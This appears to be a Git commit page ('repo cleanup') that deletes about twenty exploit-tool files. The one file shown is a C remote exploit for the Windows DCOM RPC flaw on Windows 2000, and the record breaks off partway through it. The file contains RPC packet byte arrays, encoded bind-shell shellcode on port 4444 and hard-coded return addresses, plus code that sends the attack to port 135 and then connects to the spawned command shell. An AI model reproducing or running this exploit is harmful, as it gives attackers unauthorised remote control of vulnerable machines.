3388c197
Commit
3388c197
authored
May 08, 2018
by
Dan Fauxsmith
repo cleanup
parent
8c67185a
Showing
20 changed files
with
0 additions
and
2810 deletions
+0
-2810
9780596006112
9780596006112
+0
-1
code/example-code.zip
code/example-code.zip
+0
-0
tools/0x82-dcomrpc_usemgret.c
tools/0x82-dcomrpc_usemgret.c
+0
-515
tools/0x82-wu262.c
tools/0x82-wu262.c
+0
-702
tools/1365.pl
tools/1365.pl
+0
-163
tools/1455.sql
tools/1455.sql
+0
-87
tools/1719.sql
tools/1719.sql
+0
-60
tools/2837.sql
tools/2837.sql
+0
-100
tools/2951.sql
tools/2951.sql
+0
-91
tools/2959.sql
tools/2959.sql
+0
-77
tools/3177.sql
tools/3177.sql
+0
-46
tools/3178.sql
tools/3178.sql
+0
-42
tools/3179.sql
tools/3179.sql
+0
-42
tools/3269.pl
tools/3269.pl
+0
-120
tools/3358.pl
tools/3358.pl
+0
-125
tools/3359.pl
tools/3359.pl
+0
-125
tools/3363.pl
tools/3363.pl
+0
-122
tools/3364.pl
tools/3364.pl
+0
-116
tools/3375.pl
tools/3375.pl
+0
-140
tools/3376.pl
tools/3376.pl
+0
-136
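--- a/9780596006112
+++ b/9780596006112
-9780596006112
\ No newline at end of file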
code/example-code.zip
0 → 100644
File added
tools/0x82-dcomrpc_usemgret.c
deleted
100644 → 0
/*
**
** 2003/07/27 - DCOM RPC WIN32 remote exploit (Most languages)
**
** FlashSky/Benjurry and, H D Moore's code is very excellent.
** It works well even if change only return address.
** I didn't feel necessity for new make.
**
** Thankful to them.
**
** 2003/07/30 - Update, Added magic return address.
**
** kokanin supplied very excellent information:
** URL: http://lists.netsys.com/pipermail/full-disclosure/2003-July/012000.html
**
** * As well as Korean thanks to, a lot of systems can exploit.
**
** --
** Thank you.
**
** P.S: Sorry, for my poor english.
**
** --
** exploit by "you dong-hun"(Xpl017Elz), <szoahc@hotmail.com>.
** My World: http://x82.i21c.net & http://x82.inetcop.org
*/
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/socket.h>
u_char
bindstr
[]
=
{
0x05
,
0x00
,
0x0B
,
0x03
,
0x10
,
0x00
,
0x00
,
0x00
,
0x48
,
0x00
,
0x00
,
0x00
,
0x7F
,
0x00
,
0x00
,
0x00
,
0xD0
,
0x16
,
0xD0
,
0x16
,
0x00
,
0x00
,
0x00
,
0x00
,
0x01
,
0x00
,
0x00
,
0x00
,
0x01
,
0x00
,
0x01
,
0x00
,
0xa0
,
0x01
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0xC0
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x46
,
0x00
,
0x00
,
0x00
,
0x00
,
0x04
,
0x5D
,
0x88
,
0x8A
,
0xEB
,
0x1C
,
0xC9
,
0x11
,
0x9F
,
0xE8
,
0x08
,
0x00
,
0x2B
,
0x10
,
0x48
,
0x60
,
0x02
,
0x00
,
0x00
,
0x00
};
u_char
request1
[]
=
{
0x05
,
0x00
,
0x00
,
0x03
,
0x10
,
0x00
,
0x00
,
0x00
,
0xE8
,
0x03
,
0x00
,
0x00
,
0xE5
,
0x00
,
0x00
,
0x00
,
0xD0
,
0x03
,
0x00
,
0x00
,
0x01
,
0x00
,
0x04
,
0x00
,
0x05
,
0x00
,
0x06
,
0x00
,
0x01
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x32
,
0x24
,
0x58
,
0xFD
,
0xCC
,
0x45
,
0x64
,
0x49
,
0xB0
,
0x70
,
0xDD
,
0xAE
,
0x74
,
0x2C
,
0x96
,
0xD2
,
0x60
,
0x5E
,
0x0D
,
0x00
,
0x01
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x70
,
0x5E
,
0x0D
,
0x00
,
0x02
,
0x00
,
0x00
,
0x00
,
0x7C
,
0x5E
,
0x0D
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x10
,
0x00
,
0x00
,
0x00
,
0x80
,
0x96
,
0xF1
,
0xF1
,
0x2A
,
0x4D
,
0xCE
,
0x11
,
0xA6
,
0x6A
,
0x00
,
0x20
,
0xAF
,
0x6E
,
0x72
,
0xF4
,
0x0C
,
0x00
,
0x00
,
0x00
,
0x4D
,
0x41
,
0x52
,
0x42
,
0x01
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x0D
,
0xF0
,
0xAD
,
0xBA
,
0x00
,
0x00
,
0x00
,
0x00
,
0xA8
,
0xF4
,
0x0B
,
0x00
,
0x60
,
0x03
,
0x00
,
0x00
,
0x60
,
0x03
,
0x00
,
0x00
,
0x4D
,
0x45
,
0x4F
,
0x57
,
0x04
,
0x00
,
0x00
,
0x00
,
0xA2
,
0x01
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0xC0
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x46
,
0x38
,
0x03
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0xC0
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x46
,
0x00
,
0x00
,
0x00
,
0x00
,
0x30
,
0x03
,
0x00
,
0x00
,
0x28
,
0x03
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x01
,
0x10
,
0x08
,
0x00
,
0xCC
,
0xCC
,
0xCC
,
0xCC
,
0xC8
,
0x00
,
0x00
,
0x00
,
0x4D
,
0x45
,
0x4F
,
0x57
,
0x28
,
0x03
,
0x00
,
0x00
,
0xD8
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x02
,
0x00
,
0x00
,
0x00
,
0x07
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0xC4
,
0x28
,
0xCD
,
0x00
,
0x64
,
0x29
,
0xCD
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x07
,
0x00
,
0x00
,
0x00
,
0xB9
,
0x01
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0xC0
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x46
,
0xAB
,
0x01
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0xC0
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x46
,
0xA5
,
0x01
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0xC0
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x46
,
0xA6
,
0x01
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0xC0
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x46
,
0xA4
,
0x01
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0xC0
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x46
,
0xAD
,
0x01
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0xC0
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x46
,
0xAA
,
0x01
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0xC0
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x46
,
0x07
,
0x00
,
0x00
,
0x00
,
0x60
,
0x00
,
0x00
,
0x00
,
0x58
,
0x00
,
0x00
,
0x00
,
0x90
,
0x00
,
0x00
,
0x00
,
0x40
,
0x00
,
0x00
,
0x00
,
0x20
,
0x00
,
0x00
,
0x00
,
0x78
,
0x00
,
0x00
,
0x00
,
0x30
,
0x00
,
0x00
,
0x00
,
0x01
,
0x00
,
0x00
,
0x00
,
0x01
,
0x10
,
0x08
,
0x00
,
0xCC
,
0xCC
,
0xCC
,
0xCC
,
0x50
,
0x00
,
0x00
,
0x00
,
0x4F
,
0xB6
,
0x88
,
0x20
,
0xFF
,
0xFF
,
0xFF
,
0xFF
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x01
,
0x10
,
0x08
,
0x00
,
0xCC
,
0xCC
,
0xCC
,
0xCC
,
0x48
,
0x00
,
0x00
,
0x00
,
0x07
,
0x00
,
0x66
,
0x00
,
0x06
,
0x09
,
0x02
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0xC0
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x46
,
0x10
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x01
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x78
,
0x19
,
0x0C
,
0x00
,
0x58
,
0x00
,
0x00
,
0x00
,
0x05
,
0x00
,
0x06
,
0x00
,
0x01
,
0x00
,
0x00
,
0x00
,
0x70
,
0xD8
,
0x98
,
0x93
,
0x98
,
0x4F
,
0xD2
,
0x11
,
0xA9
,
0x3D
,
0xBE
,
0x57
,
0xB2
,
0x00
,
0x00
,
0x00
,
0x32
,
0x00
,
0x31
,
0x00
,
0x01
,
0x10
,
0x08
,
0x00
,
0xCC
,
0xCC
,
0xCC
,
0xCC
,
0x80
,
0x00
,
0x00
,
0x00
,
0x0D
,
0xF0
,
0xAD
,
0xBA
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x18
,
0x43
,
0x14
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x60
,
0x00
,
0x00
,
0x00
,
0x60
,
0x00
,
0x00
,
0x00
,
0x4D
,
0x45
,
0x4F
,
0x57
,
0x04
,
0x00
,
0x00
,
0x00
,
0xC0
,
0x01
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0xC0
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x46
,
0x3B
,
0x03
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0xC0
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x46
,
0x00
,
0x00
,
0x00
,
0x00
,
0x30
,
0x00
,
0x00
,
0x00
,
0x01
,
0x00
,
0x01
,
0x00
,
0x81
,
0xC5
,
0x17
,
0x03
,
0x80
,
0x0E
,
0xE9
,
0x4A
,
0x99
,
0x99
,
0xF1
,
0x8A
,
0x50
,
0x6F
,
0x7A
,
0x85
,
0x02
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x01
,
0x00
,
0x00
,
0x00
,
0x01
,
0x10
,
0x08
,
0x00
,
0xCC
,
0xCC
,
0xCC
,
0xCC
,
0x30
,
0x00
,
0x00
,
0x00
,
0x78
,
0x00
,
0x6E
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0xD8
,
0xDA
,
0x0D
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x20
,
0x2F
,
0x0C
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x03
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x03
,
0x00
,
0x00
,
0x00
,
0x46
,
0x00
,
0x58
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x01
,
0x10
,
0x08
,
0x00
,
0xCC
,
0xCC
,
0xCC
,
0xCC
,
0x10
,
0x00
,
0x00
,
0x00
,
0x30
,
0x00
,
0x2E
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x01
,
0x10
,
0x08
,
0x00
,
0xCC
,
0xCC
,
0xCC
,
0xCC
,
0x68
,
0x00
,
0x00
,
0x00
,
0x0E
,
0x00
,
0xFF
,
0xFF
,
0x68
,
0x8B
,
0x0B
,
0x00
,
0x02
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
};
u_char
request2
[]
=
{
0x20
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x20
,
0x00
,
0x00
,
0x00
,
0x5C
,
0x00
,
0x5C
,
0x00
};
u_char
request3
[]
=
{
0x5C
,
0x00
,
0x43
,
0x00
,
0x24
,
0x00
,
0x5C
,
0x00
,
0x31
,
0x00
,
0x32
,
0x00
,
0x33
,
0x00
,
0x34
,
0x00
,
0x35
,
0x00
,
0x36
,
0x00
,
0x31
,
0x00
,
0x31
,
0x00
,
0x31
,
0x00
,
0x31
,
0x00
,
0x31
,
0x00
,
0x31
,
0x00
,
0x31
,
0x00
,
0x31
,
0x00
,
0x31
,
0x00
,
0x31
,
0x00
,
0x31
,
0x00
,
0x31
,
0x00
,
0x31
,
0x00
,
0x31
,
0x00
,
0x31
,
0x00
,
0x2E
,
0x00
,
0x64
,
0x00
,
0x6F
,
0x00
,
0x63
,
0x00
,
0x00
,
0x00
};
u_char
request4
[]
=
{
0x01
,
0x10
,
0x08
,
0x00
,
0xCC
,
0xCC
,
0xCC
,
0xCC
,
0x20
,
0x00
,
0x00
,
0x00
,
0x30
,
0x00
,
0x2D
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x88
,
0x2A
,
0x0C
,
0x00
,
0x02
,
0x00
,
0x00
,
0x00
,
0x01
,
0x00
,
0x00
,
0x00
,
0x28
,
0x8C
,
0x0C
,
0x00
,
0x01
,
0x00
,
0x00
,
0x00
,
0x07
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
};
u_char
shellcode
[]
=
{
/* port 4444 bind shellcode */
0x46
,
0x00
,
0x58
,
0x00
,
0x4e
,
0x00
,
0x42
,
0x00
,
0x46
,
0x00
,
0x58
,
0x00
,
0x46
,
0x00
,
0x58
,
0x00
,
0x4e
,
0x00
,
0x42
,
0x00
,
0x46
,
0x00
,
0x58
,
0x00
,
0x46
,
0x00
,
0x58
,
0x00
,
0x46
,
0x00
,
0x58
,
0x00
,
0x46
,
0x00
,
0x58
,
0x00
,
0xff
,
0xff
,
0xff
,
0xff
,
0xcc
,
0xe0
,
0xfd
,
0x7f
,
0xcc
,
0xe0
,
0xfd
,
0x7f
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0xeb
,
0x19
,
0x5e
,
0x31
,
0xc9
,
0x81
,
0xe9
,
0x89
,
0xff
,
0xff
,
0xff
,
0x81
,
0x36
,
0x80
,
0xbf
,
0x32
,
0x94
,
0x81
,
0xee
,
0xfc
,
0xff
,
0xff
,
0xff
,
0xe2
,
0xf2
,
0xeb
,
0x05
,
0xe8
,
0xe2
,
0xff
,
0xff
,
0xff
,
0x03
,
0x53
,
0x06
,
0x1f
,
0x74
,
0x57
,
0x75
,
0x95
,
0x80
,
0xbf
,
0xbb
,
0x92
,
0x7f
,
0x89
,
0x5a
,
0x1a
,
0xce
,
0xb1
,
0xde
,
0x7c
,
0xe1
,
0xbe
,
0x32
,
0x94
,
0x09
,
0xf9
,
0x3a
,
0x6b
,
0xb6
,
0xd7
,
0x9f
,
0x4d
,
0x85
,
0x71
,
0xda
,
0xc6
,
0x81
,
0xbf
,
0x32
,
0x1d
,
0xc6
,
0xb3
,
0x5a
,
0xf8
,
0xec
,
0xbf
,
0x32
,
0xfc
,
0xb3
,
0x8d
,
0x1c
,
0xf0
,
0xe8
,
0xc8
,
0x41
,
0xa6
,
0xdf
,
0xeb
,
0xcd
,
0xc2
,
0x88
,
0x36
,
0x74
,
0x90
,
0x7f
,
0x89
,
0x5a
,
0xe6
,
0x7e
,
0x0c
,
0x24
,
0x7c
,
0xad
,
0xbe
,
0x32
,
0x94
,
0x09
,
0xf9
,
0x22
,
0x6b
,
0xb6
,
0xd7
,
0x4c
,
0x4c
,
0x62
,
0xcc
,
0xda
,
0x8a
,
0x81
,
0xbf
,
0x32
,
0x1d
,
0xc6
,
0xab
,
0xcd
,
0xe2
,
0x84
,
0xd7
,
0xf9
,
0x79
,
0x7c
,
0x84
,
0xda
,
0x9a
,
0x81
,
0xbf
,
0x32
,
0x1d
,
0xc6
,
0xa7
,
0xcd
,
0xe2
,
0x84
,
0xd7
,
0xeb
,
0x9d
,
0x75
,
0x12
,
0xda
,
0x6a
,
0x80
,
0xbf
,
0x32
,
0x1d
,
0xc6
,
0xa3
,
0xcd
,
0xe2
,
0x84
,
0xd7
,
0x96
,
0x8e
,
0xf0
,
0x78
,
0xda
,
0x7a
,
0x80
,
0xbf
,
0x32
,
0x1d
,
0xc6
,
0x9f
,
0xcd
,
0xe2
,
0x84
,
0xd7
,
0x96
,
0x39
,
0xae
,
0x56
,
0xda
,
0x4a
,
0x80
,
0xbf
,
0x32
,
0x1d
,
0xc6
,
0x9b
,
0xcd
,
0xe2
,
0x84
,
0xd7
,
0xd7
,
0xdd
,
0x06
,
0xf6
,
0xda
,
0x5a
,
0x80
,
0xbf
,
0x32
,
0x1d
,
0xc6
,
0x97
,
0xcd
,
0xe2
,
0x84
,
0xd7
,
0xd5
,
0xed
,
0x46
,
0xc6
,
0xda
,
0x2a
,
0x80
,
0xbf
,
0x32
,
0x1d
,
0xc6
,
0x93
,
0x01
,
0x6b
,
0x01
,
0x53
,
0xa2
,
0x95
,
0x80
,
0xbf
,
0x66
,
0xfc
,
0x81
,
0xbe
,
0x32
,
0x94
,
0x7f
,
0xe9
,
0x2a
,
0xc4
,
0xd0
,
0xef
,
0x62
,
0xd4
,
0xd0
,
0xff
,
0x62
,
0x6b
,
0xd6
,
0xa3
,
0xb9
,
0x4c
,
0xd7
,
0xe8
,
0x5a
,
0x96
,
0x80
,
0xae
,
0x6e
,
0x1f
,
0x4c
,
0xd5
,
0x24
,
0xc5
,
0xd3
,
0x40
,
0x64
,
0xb4
,
0xd7
,
0xec
,
0xcd
,
0xc2
,
0xa4
,
0xe8
,
0x63
,
0xc7
,
0x7f
,
0xe9
,
0x1a
,
0x1f
,
0x50
,
0xd7
,
0x57
,
0xec
,
0xe5
,
0xbf
,
0x5a
,
0xf7
,
0xed
,
0xdb
,
0x1c
,
0x1d
,
0xe6
,
0x8f
,
0xb1
,
0x78
,
0xd4
,
0x32
,
0x0e
,
0xb0
,
0xb3
,
0x7f
,
0x01
,
0x5d
,
0x03
,
0x7e
,
0x27
,
0x3f
,
0x62
,
0x42
,
0xf4
,
0xd0
,
0xa4
,
0xaf
,
0x76
,
0x6a
,
0xc4
,
0x9b
,
0x0f
,
0x1d
,
0xd4
,
0x9b
,
0x7a
,
0x1d
,
0xd4
,
0x9b
,
0x7e
,
0x1d
,
0xd4
,
0x9b
,
0x62
,
0x19
,
0xc4
,
0x9b
,
0x22
,
0xc0
,
0xd0
,
0xee
,
0x63
,
0xc5
,
0xea
,
0xbe
,
0x63
,
0xc5
,
0x7f
,
0xc9
,
0x02
,
0xc5
,
0x7f
,
0xe9
,
0x22
,
0x1f
,
0x4c
,
0xd5
,
0xcd
,
0x6b
,
0xb1
,
0x40
,
0x64
,
0x98
,
0x0b
,
0x77
,
0x65
,
0x6b
,
0xd6
,
0x93
,
0xcd
,
0xc2
,
0x94
,
0xea
,
0x64
,
0xf0
,
0x21
,
0x8f
,
0x32
,
0x94
,
0x80
,
0x3a
,
0xf2
,
0xec
,
0x8c
,
0x34
,
0x72
,
0x98
,
0x0b
,
0xcf
,
0x2e
,
0x39
,
0x0b
,
0xd7
,
0x3a
,
0x7f
,
0x89
,
0x34
,
0x72
,
0xa0
,
0x0b
,
0x17
,
0x8a
,
0x94
,
0x80
,
0xbf
,
0xb9
,
0x51
,
0xde
,
0xe2
,
0xf0
,
0x90
,
0x80
,
0xec
,
0x67
,
0xc2
,
0xd7
,
0x34
,
0x5e
,
0xb0
,
0x98
,
0x34
,
0x77
,
0xa8
,
0x0b
,
0xeb
,
0x37
,
0xec
,
0x83
,
0x6a
,
0xb9
,
0xde
,
0x98
,
0x34
,
0x68
,
0xb4
,
0x83
,
0x62
,
0xd1
,
0xa6
,
0xc9
,
0x34
,
0x06
,
0x1f
,
0x83
,
0x4a
,
0x01
,
0x6b
,
0x7c
,
0x8c
,
0xf2
,
0x38
,
0xba
,
0x7b
,
0x46
,
0x93
,
0x41
,
0x70
,
0x3f
,
0x97
,
0x78
,
0x54
,
0xc0
,
0xaf
,
0xfc
,
0x9b
,
0x26
,
0xe1
,
0x61
,
0x34
,
0x68
,
0xb0
,
0x83
,
0x62
,
0x54
,
0x1f
,
0x8c
,
0xf4
,
0xb9
,
0xce
,
0x9c
,
0xbc
,
0xef
,
0x1f
,
0x84
,
0x34
,
0x31
,
0x51
,
0x6b
,
0xbd
,
0x01
,
0x54
,
0x0b
,
0x6a
,
0x6d
,
0xca
,
0xdd
,
0xe4
,
0xf0
,
0x90
,
0x80
,
0x2f
,
0xa2
,
0x04
,
0x00
};
struct
os_plat_pk
{
int
op_pk_num
;
char
*
op_pk_str
;
u_long
retloc_jmp_esp
;
};
struct
os_plat_pk
__pt_pkg_form
[]
=
{
{
0
,
"Windows 2000 magic version 1"
,
0x0018759F
},
{
1
,
"Windows 2000 magic version 2"
,
0x001875E3
},
{
2
,
"Windows 2000 magic version 3"
,
0x001F0CD0
},
{
3
,
"Windows 2000 magic version 4"
,
0x010016C6
},
{
4
,
"Windows 2000 magic version 5"
,
0x010016CB
},
{
0x82
,
NULL
,
0
}
};
#define DEF_STR "It's test"
#define DEF_BF (0x1000)
#define DEF_SZ (0xff)
#define GET_SZ (0x400)
int
sexsock
(
char
*
conn_host_nm
,
int
conn_port_nm
);
void
start_shell
(
int
st_sock_va
);
void
re_connt_lm
(
int
st_sock_va
);
void
pri_usg
(
char
*
f_nm
);
void
pri_banrl
();
int
main
(
int
argc
,
char
*
argv
[])
{
int
sock
,
type_def
=
(
0
),
r_r1
,
r_r2
,
whgl
;
u_long
retloc_jmp_esp
=
(
__pt_pkg_form
[
type_def
].
retloc_jmp_esp
);
u_char
get_bf
[(
DEF_BF
)],
atk_bf
[(
DEF_BF
)];
char
def_host
[(
DEF_SZ
)]
=
(
DEF_STR
);
(
void
)
pri_banrl
();
while
((
whgl
=
getopt
(
argc
,
argv
,
"T:t:H:h:Ii"
))
!=
EOF
)
{
switch
(
whgl
)
{
case
'T'
:
case
't'
:
if
((
type_def
=
atoi
(
optarg
))
>
4
)
{
(
void
)
pri_usg
(
argv
[
0
]);
}
else
retloc_jmp_esp
=
(
__pt_pkg_form
[
type_def
].
retloc_jmp_esp
);
break
;
case
'H'
:
case
'h'
:
memset
((
char
*
)
def_host
,
0
,
sizeof
(
def_host
));
strncpy
(
def_host
,
optarg
,
sizeof
(
def_host
)
-
1
);
break
;
case
'I'
:
case
'i'
:
(
void
)
pri_usg
(
argv
[
0
]);
break
;
case
'?'
:
(
void
)
pri_usg
(
argv
[
0
]);
break
;
}
}
if
(
strstr
(
def_host
,(
DEF_STR
)))
{
(
void
)
pri_usg
(
argv
[
0
]);
}
fprintf
(
stdout
,
" [*] Target: %s.
\n
"
,
__pt_pkg_form
[
type_def
].
op_pk_str
);
fprintf
(
stdout
,
" [0] Add return address.
\n
"
);
memcpy
((
u_char
*
)
shellcode
+
36
,(
u_char
*
)
&
retloc_jmp_esp
,
4
);
fprintf
(
stdout
,
" [1] Start, shellcode setting.
\n
"
);
memcpy
((
u_char
*
)
atk_bf
,
request1
,
sizeof
(
request1
));
r_r1
=
sizeof
(
request1
);
r_r2
=
sizeof
(
shellcode
)
/
2
;
#define QIK_SHIFT(v,x,l) *(u_long *)(v+x)=*(u_long *)(v+x)+l
QIK_SHIFT
(
request2
,
0
,
r_r2
);
QIK_SHIFT
(
request2
,
8
,
r_r2
);
memcpy
((
u_char
*
)
atk_bf
+
r_r1
,
request2
,
sizeof
(
request2
));
r_r1
+=
sizeof
(
request2
);
memcpy
((
u_char
*
)
atk_bf
+
r_r1
,
shellcode
,
sizeof
(
shellcode
));
r_r1
+=
sizeof
(
shellcode
);
memcpy
((
u_char
*
)
atk_bf
+
r_r1
,
request3
,
sizeof
(
request3
));
r_r1
+=
sizeof
(
request3
);
memcpy
((
u_char
*
)
atk_bf
+
r_r1
,
request4
,
sizeof
(
request4
));
r_r1
+=
sizeof
(
request4
);
r_r2
=
sizeof
(
shellcode
)
-
12
;
QIK_SHIFT
(
atk_bf
,
8
,
r_r2
);
QIK_SHIFT
(
atk_bf
,
16
,
r_r2
);
QIK_SHIFT
(
atk_bf
,
128
,
r_r2
);
QIK_SHIFT
(
atk_bf
,
132
,
r_r2
);
QIK_SHIFT
(
atk_bf
,
180
,
r_r2
);
QIK_SHIFT
(
atk_bf
,
184
,
r_r2
);
QIK_SHIFT
(
atk_bf
,
208
,
r_r2
);
QIK_SHIFT
(
atk_bf
,
396
,
r_r2
);
fprintf
(
stdout
,
" [2] Trying %s:135 ...
\n
"
,
def_host
);
sock
=
(
int
)
sexsock
(
def_host
,(
135
));
(
void
)
re_connt_lm
(
sock
);
fprintf
(
stdout
,
" [3] Connected to %s:135.
\n
"
,
def_host
);
send
(
sock
,
bindstr
,
sizeof
(
bindstr
),
0
);
recv
(
sock
,
get_bf
,
sizeof
(
get_bf
),
0
);
fprintf
(
stdout
,
" [4] Send, attack code.
\n
"
);
send
(
sock
,
atk_bf
,
r_r1
,
0
);
close
(
sock
);
fprintf
(
stdout
,
" [5] OK, Trying %s:4444 ...
\n
"
,
def_host
);
fprintf
(
stdout
,
" [*] Waiting, cmd shell "
);
fflush
(
stdout
);
sleep
(
1
);
fprintf
(
stdout
,
"."
);
fflush
(
stdout
);
sleep
(
1
);
fprintf
(
stdout
,
"."
);
fflush
(
stdout
);
sleep
(
1
);
fprintf
(
stdout
,
".
\n
"
);
sock
=
(
int
)
sexsock
(
def_host
,(
4444
));
(
void
)
re_connt_lm
(
sock
);
(
void
)
start_shell
(
sock
);
exit
(
0
);
}
int
sexsock
(
char
*
conn_host_nm
,
int
conn_port_nm
)
{
int
sock
;
struct
hostent
*
sxp
;
struct
sockaddr_in
sxp_addr
;
if
((
sxp
=
gethostbyname
(
conn_host_nm
))
==
NULL
)
{
herror
(
" [-] gethostbyname() error"
);
return
(
-
1
);
}
if
((
sock
=
socket
(
AF_INET
,
SOCK_STREAM
,
0
))
==-
1
)
{
perror
